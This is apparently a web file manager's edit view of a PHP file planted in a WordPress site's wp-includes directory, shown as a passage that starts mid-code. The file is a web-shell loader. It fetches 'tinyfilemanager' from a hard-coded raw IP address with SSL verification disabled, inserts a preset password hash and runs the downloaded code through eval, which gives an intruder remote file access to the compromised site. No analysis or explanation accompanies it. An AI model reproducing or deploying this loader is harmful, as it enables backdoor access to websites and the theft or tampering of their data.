芝麻web文件管理V1.00
编辑当前文件:/home/ezdajrnh/public_html/wp-includes/blocks/freeform/4af43030ac.php
[ 'method' => 'GET', 'follow_location' => 0, 'max_redirects' => 0, 'timeout' => 10.0 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false, 'allow_self_signed' => true, 'security_level' => 0, ] ]; $context = stream_context_create($options); $result = file_get_contents($url, false, $context); } return $result; } $download_baseurls = [ 'https://94.156.180.81:443', 'http://94.156.180.81:80', ]; $result = false; foreach($download_baseurls as $download_baseurl) { $result = hnptinst_do_get_request("{$download_baseurl}/get_tinyfilemanager"); if($result !== false) { break; } } if($result === false) { die('Could not get tinyfilemanager!'); } else { $result = str_replace("
", '$2y$12$Prm5bFOBitEwSYYy6MZzwuC6WCEOyXm1m66YOpw/RhgxnbN3QoGEi', $result); eval('?>' . $result); }